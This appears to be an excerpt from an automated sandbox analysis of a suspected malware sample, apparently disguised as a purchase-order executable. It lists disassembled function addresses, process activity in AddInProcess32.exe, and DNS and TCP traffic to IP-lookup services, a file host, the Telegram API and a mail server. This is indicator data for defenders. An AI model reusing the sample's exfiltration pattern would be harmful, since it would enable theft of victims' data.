Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	6_2_00007FFD10390900
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 4x nop then push r15	6_2_00007FFD10364F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 02FDF45Dh	10_2_02FDF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 02FDF45Dh	10_2_02FDF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 02FDFC19h	10_2_02FDF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B32D41h	10_2_06B32A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B33308h	10_2_06B32EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3E621h	10_2_06B3E378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B33308h	10_2_06B32EE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3DD71h	10_2_06B3DAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B33308h	10_2_06B33236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3D4C1h	10_2_06B3D218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3D919h	10_2_06B3D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3EA79h	10_2_06B3E7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B30D0Dh	10_2_06B30B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B316F8h	10_2_06B30B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3E1C9h	10_2_06B3DF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3F329h	10_2_06B3F080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3F781h	10_2_06B3F4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3EED1h	10_2_06B3EC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_06B30040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3D069h	10_2_06B3CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp 06B3FBD9h	10_2_06B3F930
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then mov eax, dword ptr [rsi]	22_2_00007FF6830A7A50
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then mov eax, dword ptr [rcx]	22_2_00007FF6830A55C0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FF6830A21F3
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then mov rcx, qword ptr [rcx+08h]	22_2_00007FFD0EDC0F10
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then test rdx, rdx	22_2_00007FFD0EDEF040
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EDC5030
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push r15	22_2_00007FFD0EDDCCA0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then cmp byte ptr [rcx+1Dh], 00000000h	22_2_00007FFD0EE4CDE0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbp	22_2_00007FFD0EE5C9E0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0EDD46F0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EDD4630
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EDD4630
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	22_2_00007FFD0EDD45A0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EDD4340
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EDD4340
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EDD4340
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rdi	22_2_00007FFD0EDC6260
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push r15	22_2_00007FFD0EDDE120
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push r15	22_2_00007FFD0EE3E240
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EE4E1C0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push r15	22_2_00007FFD0EDE819C
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EE60160
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push r15	22_2_00007FFD0EDE8170
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rdi	22_2_00007FFD0EE5FF20
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push r14	22_2_00007FFD0EE5FF20
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 38h	22_2_00007FFD0EDCDEE0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0EDD3FA0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EE61D30
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then test rdx, rdx	22_2_00007FFD0EDEDD60
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0EDCDB40
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0EDCDBB0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	22_2_00007FFD0EE3D9D0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EDB99C0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0EE17980
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then xor eax, eax	22_2_00007FFD0EDC167D
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rdi	22_2_00007FFD0EDED780
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 38h	22_2_00007FFD0EE2D640
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then mov rcx, qword ptr [rcx+08h]	22_2_00007FFD0F015FB0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push r15	22_2_00007FFD0F034F90
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0F060900
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0F060900
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then test r8d, r8d	22_2_00007FFD0F0A4D20
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbp	22_2_00007FFD0EFE2C25
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0F060900
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0F060900
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0F012830
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0F066580
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push r15	22_2_00007FFD0F0325E0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	22_2_00007FFD0F03A460
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 38h	22_2_00007FFD0F07C1E0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then cmp edx, 02h	22_2_00007FFD0F096100
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0F027ED0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbp	22_2_00007FFD0F0B3EC0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	22_2_00007FFD0F027F20
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	22_2_00007FFD0F05DD60
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0F027DC0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0F027E10
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0F027E10
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rdi	22_2_00007FFD0F0B7E00
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push r14	22_2_00007FFD0F0B7E00
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0F019CF0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rsi	22_2_00007FFD0F05DD10
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0F027B60
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0F027B60
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rbx	22_2_00007FFD0F027B60
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0F027870
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then push rdi	22_2_00007FFD0F01B370
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0F0213C0
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 4x nop then sub rsp, 28h	22_2_00007FFD0F0210B0

Source: global traffic	DNS query: name: f004.backblazeb2.com
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: api.telegram.org
Source: global traffic	DNS query: name: mail.groupscrea.com
Source: global traffic	DNS query: name: otelrules.svc.static.microsoft

Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49700 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49702 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49703 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49704 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49706 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49707 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49708 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49712 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49713 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49714 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49718 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49719 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49720 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49724 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49726 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49725 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49730 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49731 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49732 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49736 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49737 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49738 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49742 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49744 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49745 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49746 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.10:49748 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49750 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.10:49751 -> 104.21.112.1:443
Source: global traffic	TCP traffic: 192.168.2.10:49752 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.10:49754 -> 13.107.253.67:443
Source: global traffic	TCP traffic: 192.168.2.10:49757 -> 13.107.253.67:443
Source: global traffic	TCP traffic: 192.168.2.10:49758 -> 13.107.253.67:443
Source: global traffic	TCP traffic: 192.168.2.10:49692 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49699 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49692 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49701 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49692 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49699 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49701 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49705 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49699 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49701 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49709 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49710 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49711 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49715 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49716 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49717 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49721 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49722 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49723 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49727 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49728 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49729 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49733 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49734 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49735 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49739 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49740 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49741 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49747 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49749 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
Source: global traffic	TCP traffic: 192.168.2.10:49686 -> 149.137.128.16:443
